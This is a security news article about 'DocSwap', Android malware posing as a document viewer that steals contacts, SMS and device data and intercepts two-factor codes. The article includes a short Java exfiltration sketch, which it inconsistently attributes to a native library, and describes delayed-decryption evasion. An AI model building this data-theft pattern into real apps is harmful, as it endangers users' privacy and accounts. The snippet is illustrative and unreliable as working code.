Cyber Security News

DocSwap Malware as Security Document Viewer Attacking Android Users Worldwide

A sophisticated malware campaign dubbed “DocSwap” has emerged targeting Android users globally by disguising itself as a legitimate document security and viewing application.

The malware leverages social engineering tactics to trick users into installing what appears to be a productivity tool while covertly establishing persistence on victims’ devices and exfiltrating sensitive information.

Initial infection typically occurs through phishing emails or compromised websites promoting the fake document viewer as a solution for securely opening PDF and Office files.

Upon installation, DocSwap requests extensive permissions, including access to contacts, storage, and SMS messaging capabilities.

S2W Security analysts noted that once installed, the malware establishes a connection to command-and-control servers using an encrypted protocol to bypass standard detection methods.

Their analysis revealed a significant spike in infections across Asia, Europe, and North America in the past three weeks.

The malware implements a sophisticated obfuscation technique to hide its malicious code.

When the application is opened, it actually does display document viewing capabilities while simultaneously executing its payload in the background, making detection particularly challenging for average users.

The core of DocSwap’s functionality relies on a native library that executes the following code:-

private void exfiltrateData() {
    String deviceInfo = getDeviceInfo();
    String contactsList = getContacts();
    String smsData = getMessages();

    new AsyncTask() {
        @Override
        protected Void doInBackground(Void... params) {
            sendToC2Server(encryptData(deviceInfo + contactsList + smsData));
            return null;
        }
    }.execute();
}

Attack Analysis

The malware utilizes a multi-stage infection process that begins with a dropper component. This initial payload appears benign but contains an encrypted payload that decrypts after a predetermined delay.

This technique helps evade sandbox analysis and dynamic scanning tools commonly used by security researchers.

Analysis of the network traffic shows that DocSwap communicates with servers primarily located in Eastern Europe and Southeast Asia, using a custom protocol that mimics legitimate HTTPS traffic.

The most concerning aspect of DocSwap is its ability to intercept and forward authentication SMS messages, potentially compromising two-factor authentication.

Security experts recommend immediate removal of any suspicious document viewing applications and running full device scans with reputable antivirus software.

Users should also enable Google Play Protect and avoid installing applications from unknown sources.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Microsoft Sued for Allegedly Misleading Millions to Subscribe for Microsoft 365 Subscriptions

Australia's competition regulator has filed legal proceedings against Microsoft for allegedly misleading approximately 2.7 million…

31 minutes ago

Magento Input Validation Vulnerability Exploited In Wild To Hijack Session And Execute Malicious Codes

A critical vulnerability in Magento, the popular e-commerce platform, is now rebranded as Adobe Commerce.…

38 minutes ago

Microsoft Details ASP.NET Vulnerability That Enables Attackers To Smuggle HTTP Requests

Microsoft has issued a critical security update for ASP.NET Core to address CVE-2025-55315, a high-severity…

58 minutes ago

Docker Compose Vulnerability Allow Attacks To Overwrite Arbitrary Files

Docker Compose, a cornerstone tool for developers managing containerized application harbors a high-severity vulnerability that…

2 hours ago

New Android Malware Herodotus Mimic Human Behaviour to Bypass Biometrics Detection

A sophisticated Android banking trojan named Herodotus has emerged on the mobile threat landscape, introducing…

4 hours ago

New Phishing Attack Using Invisible Characters Hidden in Subject Line Using MIME Encoding

Cybercriminals have developed a sophisticated phishing technique that exploits invisible characters embedded within email subject…

5 hours ago